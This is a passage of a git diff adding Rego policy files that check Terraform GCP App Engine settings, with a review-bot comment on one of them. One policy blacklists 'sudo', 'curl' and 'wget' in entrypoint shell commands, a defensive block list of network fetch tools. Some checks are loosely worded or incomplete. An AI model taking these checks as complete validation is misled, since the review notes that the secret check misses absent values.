missing/invalid", + "remedies": ["Please provide the valid client secret"] + }, + { + "condition": "Ensure client secret is not a placeholder", + "attribute_path": ["iap", 0, "oauth2_client_secret"], + "values": ["password", "12345"], + "policy_type": "blacklist" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file 
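Review bot: in oauth2_client_secret/policy.rego the blacklist of `["password", "12345"]` cannot detect the "missing" case that the `situation_description` ("OAuth2 Client Secret is missing/invalid") claims, since an absent `iap.oauth2_client_secret` is not a blacklisted value; either narrow the description and remedy to "placeholder secret" or add a separate condition that requires the attribute to be present. The package name `...app_engine_application.iap.oauth2_client_secret` also keeps the `iap` path segment while the sibling client-id policy in this PR uses `...app_engine_application.oauth2_client_id` without it; pick one naming convention for nested attributes.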
diff --git a/policies/gcp/app_engine/app_engine_application/location_id/policy.rego b/policies/gcp/app_engine/app_engine_application/location_id/policy.rego new file mode 100644 index 000000000..ca2b409d2 --- /dev/null +++ b/policies/gcp/app_engine/app_engine_application/location_id/policy.rego @@ -0,0 +1,21 @@ +package terraform.gcp.security.app_engine.app_engine_application.location_id + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_application.vars + +conditions := [ + [ + {"situation_description" : "App Engine application is being deployed within an unapproved region", + "remedies":[ "Location should be an approved region, e.g., australia-southeast1"]}, + { + "condition": "Check if location_id is allowed", + "attribute_path": ["location_id"], + "values" : ["australia-southeast1", "australia-southeast2"], + "policy_type" : "whitelist" + } + ] +] + + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_application/project/policy.rego b/policies/gcp/app_engine/app_engine_application/project/policy.rego new file mode 100644 index 000000000..16d906b32 --- /dev/null +++ b/policies/gcp/app_engine/app_engine_application/project/policy.rego 
@@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_application.project + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_application.vars + +conditions := [ + [ + { + "situation_description": "App Engine application is being deployed to an invalid project", + "remedies": ["Set the 'project' attribute to an approved Hardhat Enterprises Project ID"] + }, + { + "condition": "Whitelist approved Project IDs", + "attribute_path": ["project"], + "values": ["gcp-project-12345"], + "policy_type": "whitelist" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_application/serving_status/policy.rego b/policies/gcp/app_engine/app_engine_application/serving_status/policy.rego new file mode 100644 index 000000000..5f93f8bfa --- /dev/null +++ b/policies/gcp/app_engine/app_engine_application/serving_status/policy.rego @@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_application.serving_status + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_application.vars + +conditions := [ + [ + { + "situation_description": "App Engine application is not serving traffic", + "remedies": ["Please set serving_status to SERVING for the App Engine application"] + }, + { + "condition": "Ensure that application is serving traffic", + "attribute_path": ["serving_status"], + "values": ["SERVING"], + "policy_type": "whitelist" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file 
diff --git a/policies/gcp/app_engine/app_engine_application/ssl_policy/policy.rego b/policies/gcp/app_engine/app_engine_application/ssl_policy/policy.rego new file mode 100644 index 000000000..19c01fab5 --- /dev/null +++ b/policies/gcp/app_engine/app_engine_application/ssl_policy/policy.rego @@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_application.ssl_policy + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_application.vars + +conditions := [ + [ + { + "situation_description": "App Engine Application is using an unspecified SSL policy", + "remedies": ["Ensure ssl_policy is set to DEFAULT or MODERN"] + }, + { + "condition": "Blacklist SSL_POLICY_UNSPECIFIED", + "attribute_path": ["ssl_policy"], + "values": ["SSL_POLICY_UNSPECIFIED"], + "policy_type": "blacklist" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_application/vars.rego b/policies/gcp/app_engine/app_engine_application/vars.rego new file mode 100644 index 000000000..77ab28572 --- /dev/null +++ b/policies/gcp/app_engine/app_engine_application/vars.rego @@ -0,0 +1,8 @@ +package terraform.gcp.security.app_engine.app_engine_application.vars + + +variables := { + "friendly_resource_name": "App Engine Application", # eg., "GCS Bucket", + "resource_type": "google_app_engine_application", # eg., "google_storage_bucket" + "resource_value_name" : "name" # eg., "name" +} \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_domain/policy.rego b/policies/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_domain/policy.rego new file mode 100644 index 000000000..dd06b228e --- /dev/null 
+++ b/policies/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_domain/policy.rego @@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_application_url_dispatch_rules.dispatch_rules.dispatch_rules_domain + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_application_url_dispatch_rules.vars + +conditions := [ + [ + { + "situation_description": "Dispatch rule uses an unapproved domain", + "remedies": ["Set the domain to 'hardhat.pythonanywhere.com' or a '*.hardhatenterprises.com' subdomain"] + }, + { + "condition": "Check dispatch_rules.domain", + "attribute_path": ["dispatch_rules", 0, "domain"], + "values": ["hardhat.pythonanywhere.com", "*.hardhatenterprises.com"], + "policy_type": "whitelist" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_path/policy.rego b/policies/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_path/policy.rego new file mode 100644 index 000000000..66bcb072a --- /dev/null +++ b/policies/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_path/policy.rego 
@@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_application_url_dispatch_rules.dispatch_rules.dispatch_rules_path + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_application_url_dispatch_rules.vars + +conditions := [ + [ + { + "situation_description": "A dispatch rule path is invalid", + "remedies": ["Ensure that the path begins with a forward slash (e.g., '/', '/*', '/api/*')"] + }, + { + "condition": "Check dispatch_rules.path starts with slash", + "attribute_path": ["dispatch_rules", 0, "path"], + "values": ["*/*", [ ["/"], [] ] ], + "policy_type": "pattern whitelist" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_service/policy.rego b/policies/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_service/policy.rego new file mode 100644 index 000000000..0abdf3b5d --- /dev/null +++ b/policies/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_service/policy.rego 
@@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_application_url_dispatch_rules.dispatch_rules.dispatch_rules_service + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_application_url_dispatch_rules.vars + +conditions := [ + [ + { + "situation_description": "Dispatch rule routes traffic to an unapproved service", + "remedies": ["Set dispatch_rules.service to an approved service (e.g. 'default' or 'admin')"] + }, + { + "condition": "Check that dispatch_rules.service is whitelisted", + "attribute_path": ["dispatch_rules", 0, "service"], + "values": ["default", "admin", "api-gateway"], + "policy_type": "whitelist" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_application_url_dispatch_rules/vars.rego b/policies/gcp/app_engine/app_engine_application_url_dispatch_rules/vars.rego new file mode 100644 index 000000000..e9448eed0 --- /dev/null +++ b/policies/gcp/app_engine/app_engine_application_url_dispatch_rules/vars.rego @@ -0,0 +1,8 @@ +package terraform.gcp.security.app_engine.app_engine_application_url_dispatch_rules.vars + + +variables := { + "friendly_resource_name": "App Engine Application URL dispatch Rules", # eg., "GCS Bucket", + "resource_type": "google_app_engine_application_url_dispatch_rules", # eg., "google_storage_bucket" + "resource_value_name" : "name" # eg., "name" +} \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_domain_mapping/domain_name/policy.rego b/policies/gcp/app_engine/app_engine_domain_mapping/domain_name/policy.rego new file mode 100644 index 000000000..e1e75a37c --- /dev/null +++ b/policies/gcp/app_engine/app_engine_domain_mapping/domain_name/policy.rego 
@@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_domain_mapping.domain_name + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_domain_mapping.vars + +conditions := [ + [ + { + "situation_description": "Domain mapping is utilising an unapproved domain name", + "remedies": ["Use an approved domain: 'hardhat.pythonanywhere.com' or 'hardhatenterprises.com'"] + }, + { + "condition": "Check domain_name against whitelist", + "attribute_path": ["domain_name"], + "values": ["hardhat.pythonanywhere.com", "hardhatenterprises.com"], + "policy_type": "whitelist" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_domain_mapping/override_strategy/policy.rego b/policies/gcp/app_engine/app_engine_domain_mapping/override_strategy/policy.rego new file mode 100644 index 000000000..6001fe1ff --- /dev/null +++ b/policies/gcp/app_engine/app_engine_domain_mapping/override_strategy/policy.rego @@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_domain_mapping.override_strategy + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_domain_mapping.vars + +conditions := [ + [ + { + "situation_description": "override_strategy is invalid", + "remedies": ["Ensure that override_strategy is set to 'STRICT'"] + }, + { + "condition": "Check that override_strategy is valid", + "attribute_path": ["override_strategy"], + "values": ["STRICT"], + "policy_type": "whitelist" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file 
diff --git a/policies/gcp/app_engine/app_engine_domain_mapping/ssl_settings/ssl_management_type/policy.rego b/policies/gcp/app_engine/app_engine_domain_mapping/ssl_settings/ssl_management_type/policy.rego new file mode 100644 index 000000000..9a8f63b74 --- /dev/null +++ b/policies/gcp/app_engine/app_engine_domain_mapping/ssl_settings/ssl_management_type/policy.rego @@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_domain_mapping.ssl_settings.ssl_management_type + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_domain_mapping.vars + +conditions := [ + [ + { + "situation_description": "SSL management type is invalid", + "remedies": ["Set ssl_management_type to 'AUTOMATIC'"] + }, + { + "condition": "Check ssl_management_type is valid", + "attribute_path": ["ssl_settings", 0, "ssl_management_type"], + "values": ["AUTOMATIC"], + "policy_type": "whitelist" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_domain_mapping/vars.rego b/policies/gcp/app_engine/app_engine_domain_mapping/vars.rego new file mode 100644 index 000000000..4014c7113 --- /dev/null +++ b/policies/gcp/app_engine/app_engine_domain_mapping/vars.rego @@ -0,0 +1,8 @@ +package terraform.gcp.security.app_engine.app_engine_domain_mapping.vars + + +variables := { + "friendly_resource_name": "App Engine Domain Mapping", # eg., "GCS Bucket", + "resource_type": "google_app_engine_domain_mapping", # eg., "google_storage_bucket" + "resource_value_name" : "name" # eg., "name" +} \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_firewall_rule/action/policy.rego b/policies/gcp/app_engine/app_engine_firewall_rule/action/policy.rego new file mode 100644 index 000000000..17bb976d0 --- /dev/null 
+++ b/policies/gcp/app_engine/app_engine_firewall_rule/action/policy.rego @@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_firewall_rule.action + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_firewall_rule.vars + +conditions := [ + [ + { + "situation_description": "Firewall rule action is not compliant", + "remedies": ["Set action to 'ALLOW' for this firewall rule"] + }, + { + "condition": "Check firewall action is 'ALLOW'", + "attribute_path": ["action"], + "values": ["ALLOW"], + "policy_type": "whitelist" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_firewall_rule/priority/policy.rego b/policies/gcp/app_engine/app_engine_firewall_rule/priority/policy.rego new file mode 100644 index 000000000..bfa4984a0 --- /dev/null +++ b/policies/gcp/app_engine/app_engine_firewall_rule/priority/policy.rego @@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_firewall_rule.priority + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_firewall_rule.vars + +conditions := [ + [ + { + "situation_description": "Firewall rule priority is not within approved range", + "remedies": ["Set the priority to a value between 1 and 2,147,483,646"] + }, + { + "condition": "Check firewall rule priority is within approved range", + "attribute_path": ["priority"], + "values": [1, 2147483646], + "policy_type": "range" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file 
diff --git a/policies/gcp/app_engine/app_engine_firewall_rule/source_range/policy.rego b/policies/gcp/app_engine/app_engine_firewall_rule/source_range/policy.rego new file mode 100644 index 000000000..ed3ccb67a --- /dev/null +++ b/policies/gcp/app_engine/app_engine_firewall_rule/source_range/policy.rego @@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_firewall_rule.source_range + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_firewall_rule.vars + +conditions := [ + [ + { + "situation_description": "Firewall rule allows traffic from all sources (*)", + "remedies": ["Replace '*' with a specific CIDR range (such as '192.168.1.0/24' or '1.2.3.4/32')"] + }, + { + "condition": "Block wildcard source ranges", + "attribute_path": ["source_range"], + "values": ["*"], + "policy_type": "blacklist" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_firewall_rule/vars.rego b/policies/gcp/app_engine/app_engine_firewall_rule/vars.rego new file mode 100644 index 000000000..dc6452865 --- /dev/null +++ b/policies/gcp/app_engine/app_engine_firewall_rule/vars.rego @@ -0,0 +1,8 @@ +package terraform.gcp.security.app_engine.app_engine_firewall_rule.vars + + +variables := { + "friendly_resource_name": "App Engine Firewall Rule", # eg., "GCS Bucket", + "resource_type": "google_app_engine_firewall_rule", # eg., "google_storage_bucket" + "resource_value_name" : "name" # eg., "name" +} \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_flexible_app_version/automatic_scaling/cpu_utilization/target_utilization/policy.rego b/policies/gcp/app_engine/app_engine_flexible_app_version/automatic_scaling/cpu_utilization/target_utilization/policy.rego new file mode 100644 index 000000000..40727dbad --- /dev/null 
+++ b/policies/gcp/app_engine/app_engine_flexible_app_version/automatic_scaling/cpu_utilization/target_utilization/policy.rego @@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_flexible_app_version.automatic_scaling.cpu_utilization.target_utilization + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_flexible_app_version.vars + +conditions := [ + [ + { + "situation_description": "App Engine CPU target utilization is not within the approved range", + "remedies": ["Set 'automatic_scaling.cpu_utilization.target_utilization' to a value between 0.5 and 0.8"] + }, + { + "condition": "Check CPU target utilization is within the approved range", + "attribute_path": ["automatic_scaling", 0, "cpu_utilization", 0, "target_utilization"], + "values": [0.5, 0.8], + "policy_type": "range" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_flexible_app_version/deployment/zip/source_url/policy.rego b/policies/gcp/app_engine/app_engine_flexible_app_version/deployment/zip/source_url/policy.rego new file mode 100644 index 000000000..395ea1d99 --- /dev/null +++ b/policies/gcp/app_engine/app_engine_flexible_app_version/deployment/zip/source_url/policy.rego 
@@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_flexible_app_version.deployment.zip.source_url + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_flexible_app_version.vars + +conditions := [ + [ + { + "situation_description": "App Engine application code is being deployed from an unauthorized source URL", + "remedies": ["Set 'deployment.zip.source_url' to an authorized GCS URL"] + }, + { + "condition": "Match against exact approved deployment URLs", + "attribute_path": ["deployment", 0, "zip", 0, "source_url"], + "values": ["https://storage.googleapis.com/hardhat-bucket/hello-world.zip"], + "policy_type": "whitelist" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_flexible_app_version/entrypoint/shell/policy.rego b/policies/gcp/app_engine/app_engine_flexible_app_version/entrypoint/shell/policy.rego new file mode 100644 index 000000000..46a68a242 --- /dev/null +++ b/policies/gcp/app_engine/app_engine_flexible_app_version/entrypoint/shell/policy.rego 
@@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_flexible_app_version.entrypoint.shell + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_flexible_app_version.vars + +conditions := [ + [ + { + "situation_description": "App Engine entrypoint contains unauthorized/insecure commands", + "remedies": ["Please remove 'sudo', 'curl', or 'wget' from the entrypoint.shell command"] + }, + { + "condition": "Blacklist insecure shell commands", + "attribute_path": ["entrypoint", 0, "shell"], + "values": ["*/*", [ ["sudo node .", "curl .", "wget .", "sudo", "curl", "wget"], [] ]], + "policy_type": "pattern blacklist" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_flexible_app_version/liveness_check/failure_threshold/policy.rego b/policies/gcp/app_engine/app_engine_flexible_app_version/liveness_check/failure_threshold/policy.rego new file mode 100644 index 000000000..918c5fac0 --- /dev/null +++ b/policies/gcp/app_engine/app_engine_flexible_app_version/liveness_check/failure_threshold/policy.rego 
@@ -0,0 +1,24 @@ +package terraform.gcp.security.app_engine.app_engine_flexible_app_version.liveness_check.failure_threshold + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_flexible_app_version.vars + + +conditions := [ + [ + { + "situation_description": "failure_threshold is too low/not safely configured", + "remedies": ["Set failure_threshold to at least 1" + ] + }, + { + "condition": "Check that failure_threshold is below minimum safe value", + "attribute_path": ["liveness_check", 0, "failure_threshold"], + "values": [1, null], + "policy_type": "range" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_flexible_app_version/liveness_check/path/policy.rego b/policies/gcp/app_engine/app_engine_flexible_app_version/liveness_check/path/policy.rego new file mode 100644 index 000000000..2b34e1e22 --- /dev/null +++ b/policies/gcp/app_engine/app_engine_flexible_app_version/liveness_check/path/policy.rego @@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_flexible_app_version.liveness_check.path + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_flexible_app_version.vars + +conditions := [ + [ + { + "situation_description": "App Engine liveness check is pointing to an unapproved path", + "remedies": ["set liveness_check.path to an approved endpoint (e.g. '/', '/healthz')"] + }, + { + "condition": "Whitelist approved liveness paths", + "attribute_path": ["liveness_check", 0, "path"], + "values": ["/", "/healthz"], + "policy_type": "whitelist" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file 
diff --git a/policies/gcp/app_engine/app_engine_flexible_app_version/liveness_check/timeout/policy.rego b/policies/gcp/app_engine/app_engine_flexible_app_version/liveness_check/timeout/policy.rego new file mode 100644 index 000000000..7fae022ca --- /dev/null +++ b/policies/gcp/app_engine/app_engine_flexible_app_version/liveness_check/timeout/policy.rego @@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_flexible_app_version.liveness_check.timeout + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_flexible_app_version.vars + +conditions := [ + [ + { + "situation_description": "App Engine liveness check timeout is set to an unapproved duration", + "remedies": ["set 'liveness_check.timeout' to an approved duration (within 1s to 10s')"] + }, + { + "condition": "Whitelist approved timeout durations", + "attribute_path": ["liveness_check", 0, "timeout"], + "values": ["1s", "2s", "3s", "4s", "5s", "6s", "7s", "8s", "9s", "10s", "1", "2", "3", "4", "5", "6", "7", "8", "9", "10"], + "policy_type": "whitelist" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_flexible_app_version/readiness_check/failure_threshold/policy.rego b/policies/gcp/app_engine/app_engine_flexible_app_version/readiness_check/failure_threshold/policy.rego new file mode 100644 index 000000000..5c0abe922 --- /dev/null +++ b/policies/gcp/app_engine/app_engine_flexible_app_version/readiness_check/failure_threshold/policy.rego 
@@ -0,0 +1,24 @@ +package terraform.gcp.security.app_engine.app_engine_flexible_app_version.readiness_check.failure_threshold + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_flexible_app_version.vars + + +conditions := [ + [ + { + "situation_description": "failure_threshold is too low/not safely configured", + "remedies": ["Set failure_threshold to at least 1" + ] + }, + { + "condition": "Check that failure_threshold is below minimum safe value", + "attribute_path": ["readiness_check", 0, "failure_threshold"], + "values": [1, null], + "policy_type": "range" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_flexible_app_version/readiness_check/path/policy.rego b/policies/gcp/app_engine/app_engine_flexible_app_version/readiness_check/path/policy.rego new file mode 100644 index 000000000..1326aee29 --- /dev/null +++ b/policies/gcp/app_engine/app_engine_flexible_app_version/readiness_check/path/policy.rego @@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_flexible_app_version.readiness_check.path + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_flexible_app_version.vars + +conditions := [ + [ + { + "situation_description": "App Engine readiness check is pointing to a path that is unapproved", + "remedies": ["Set 'readiness_check.path' to an approved endpoint (e.g. '/', '/health')"] + }, + { + "condition": "Ensure readiness check path is allowed", + "attribute_path": ["readiness_check", 0, "path"], + "values": ["/", "/health"], + "policy_type": "whitelist" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file 
diff --git a/policies/gcp/app_engine/app_engine_flexible_app_version/readiness_check/timeout/policy.rego b/policies/gcp/app_engine/app_engine_flexible_app_version/readiness_check/timeout/policy.rego new file mode 100644 index 000000000..fa500ddd5 --- /dev/null +++ b/policies/gcp/app_engine/app_engine_flexible_app_version/readiness_check/timeout/policy.rego @@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_flexible_app_version.readiness_check.timeout + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_flexible_app_version.vars + +conditions := [ + [ + { + "situation_description": "App Engine readiness check timeout is set to an unapproved duration", + "remedies": ["Have 'readiness_check.timeout' set to an approved duration (within 1s to 10s)"] + }, + { + "condition": "Ensure readiness timeout is within 1-10s", + "attribute_path": ["readiness_check", 0, "timeout"], + "values": ["1s", "2s", "3s", "4s", "5s", "6s", "7s", "8s", "9s", "10s", "1", "2", "3", "4", "5", "6", "7", "8", "9", "10"], + "policy_type": "whitelist" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_flexible_app_version/runtime/policy.rego b/policies/gcp/app_engine/app_engine_flexible_app_version/runtime/policy.rego new file mode 100644 index 000000000..59af4f0cc --- /dev/null +++ b/policies/gcp/app_engine/app_engine_flexible_app_version/runtime/policy.rego 
@@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_flexible_app_version.runtime + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_flexible_app_version.vars + +conditions := [ + [ + { + "situation_description": "App Engine Flexible is using an unapproved/deprecated runtime", + "remedies": ["Set 'runtime' to an approved value (e.g., 'nodejs', 'python', 'java')"] + }, + { + "condition": "Whitelist approved Flexible runtimes", + "attribute_path": ["runtime"], + "values": ["nodejs", "python", "java", "custom"], + "policy_type": "whitelist" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_flexible_app_version/service/policy.rego b/policies/gcp/app_engine/app_engine_flexible_app_version/service/policy.rego new file mode 100644 index 000000000..6eecc1639 --- /dev/null +++ b/policies/gcp/app_engine/app_engine_flexible_app_version/service/policy.rego @@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_flexible_app_version.service + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_flexible_app_version.vars + +conditions := [ + [ + { + "situation_description": "App Engine service name does not meet naming standards", + "remedies": ["Rename the service to 'default' or use the 'hh-' prefix (e.g.'hh-frontend')"] + }, + { + "condition": "Service name must be 'default' or start with 'hh-'", + "attribute_path": ["service"], + "values": ["*", [["default", "hh-*"]]], + "policy_type": "pattern whitelist" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file 
diff --git a/policies/gcp/app_engine/app_engine_flexible_app_version/vars.rego b/policies/gcp/app_engine/app_engine_flexible_app_version/vars.rego new file mode 100644 index 000000000..67a707cae --- /dev/null +++ b/policies/gcp/app_engine/app_engine_flexible_app_version/vars.rego @@ -0,0 +1,8 @@ +package terraform.gcp.security.app_engine.app_engine_flexible_app_version.vars + + +variables := { + "friendly_resource_name": "App Engine Flexible App Version", # eg., "GCS Bucket", + "resource_type": "google_app_engine_flexible_app_version", # eg., "google_storage_bucket" + "resource_value_name" : "name" # eg., "name" +} \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_service_network_settings/network_settings/ingress_traffic_allowed/policy.rego b/policies/gcp/app_engine/app_engine_service_network_settings/network_settings/ingress_traffic_allowed/policy.rego new file mode 100644 index 000000000..d764d9622 --- /dev/null +++ b/policies/gcp/app_engine/app_engine_service_network_settings/network_settings/ingress_traffic_allowed/policy.rego @@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_service_network_settings.ingress_traffic_allowed + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_service_network_settings.vars + +conditions := [ + [ + { + "situation_description": "App Engine service ingress is too permissive or unspecified", + "remedies": ["Set ingress_traffic_allowed to 'INGRESS_TRAFFIC_ALLOWED_INTERNAL_ONLY'"] + }, + { + "condition": "Enforce internal-only ingress", + "attribute_path": ["network_settings", 0, "ingress_traffic_allowed"], + "values": ["INGRESS_TRAFFIC_ALLOWED_INTERNAL_ONLY"], + "policy_type": "whitelist" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file 
diff --git a/policies/gcp/app_engine/app_engine_service_network_settings/service/policy.rego b/policies/gcp/app_engine/app_engine_service_network_settings/service/policy.rego new file mode 100644 index 000000000..e49af78a4 --- /dev/null +++ b/policies/gcp/app_engine/app_engine_service_network_settings/service/policy.rego @@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_service_network_settings.service + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_service_network_settings.vars + +conditions := [ + [ + { + "situation_description": "App Engine service name does not follow the required naming convention", + "remedies": ["Ensure to set the service name to an approved value, such as 'app-internal-service'"] + }, + { + "condition": "Check service naming against whitelist", + "attribute_path": ["service"], + "values": ["app-internal-service"], + "policy_type": "whitelist" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_service_network_settings/vars.rego b/policies/gcp/app_engine/app_engine_service_network_settings/vars.rego new file mode 100644 index 000000000..11d377fcf --- /dev/null +++ b/policies/gcp/app_engine/app_engine_service_network_settings/vars.rego @@ -0,0 +1,8 @@ +package terraform.gcp.security.app_engine.app_engine_service_network_settings.vars + + +variables := { + "friendly_resource_name": "App Engine Service Network Settings", # eg., "GCS Bucket", + "resource_type": "google_app_engine_service_network_settings", # eg., "google_storage_bucket" + "resource_value_name" : "name" # eg., "name" +} \ No newline at end of file 
